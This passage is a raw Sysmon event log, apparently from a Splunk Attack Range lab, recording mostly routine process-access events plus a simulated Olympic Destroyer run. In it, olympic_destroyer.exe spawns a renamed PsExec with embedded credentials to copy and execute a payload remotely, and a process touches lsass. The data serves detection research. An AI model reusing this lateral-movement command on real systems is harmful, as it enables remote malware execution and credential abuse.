Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217727Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:50.042{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-12F2-6216-8604-000000003902}580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217726Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:50.042{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217725Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:50.042{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217724Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:50.042{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217723Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:50.042{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217722Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:50.042{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217721Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:50.042{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217720Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:50.042{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217719Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:50.042{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217718Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:50.042{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217717Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:50.042{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-12F2-6216-8604-000000003902}580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217716Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:50.042{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-12F2-6216-8604-000000003902}580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217715Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:50.043{4F8D34B0-12F2-6216-8604-000000003902}580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000291583Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.581{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291582Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.581{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291581Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.581{C8EA50B7-12E6-6216-4B05-000000003802}67926872C:\Temp\olympic_destroyer.exe{C8EA50B7-12F2-6216-AD05-000000003802}6284C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291580Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.583{C8EA50B7-12F2-6216-AD05-000000003802}6284C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\255.255.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291579Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.581{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F2-6216-AD05-000000003802}6284C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000291578Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.497{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=D6AC2E6F1EF994601294EB774C555CAB,SHA256=E0ECBD25B5A9D080CD9A25E540A55367889133ADFF474554A46C05D8E2BCCDA6,IMPHASH=00000000000000000000000000000000falsetrue 534500x8000000000000000291577Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.366{C8EA50B7-12F2-6216-AB05-000000003802}6256C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291576Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.366{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12F2-6216-AB05-000000003802}6256C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291575Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.366{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12F2-6216-AB05-000000003802}6256C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291574Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:50.344{C8EA50B7-12F2-6216-AB05-000000003802}6256C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291573Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.313{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12F2-6216-AC05-000000003802}5268C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291572Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.313{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12F2-6216-AC05-000000003802}5268C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291571Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.313{C8EA50B7-12F2-6216-AC05-000000003802}52685308C:\Windows\system32\conhost.exe{C8EA50B7-12F2-6216-AB05-000000003802}6256C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291570Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.282{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12F2-6216-AC05-000000003802}5268C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291569Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.266{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F2-6216-AC05-000000003802}5268C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291568Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.166{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291567Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 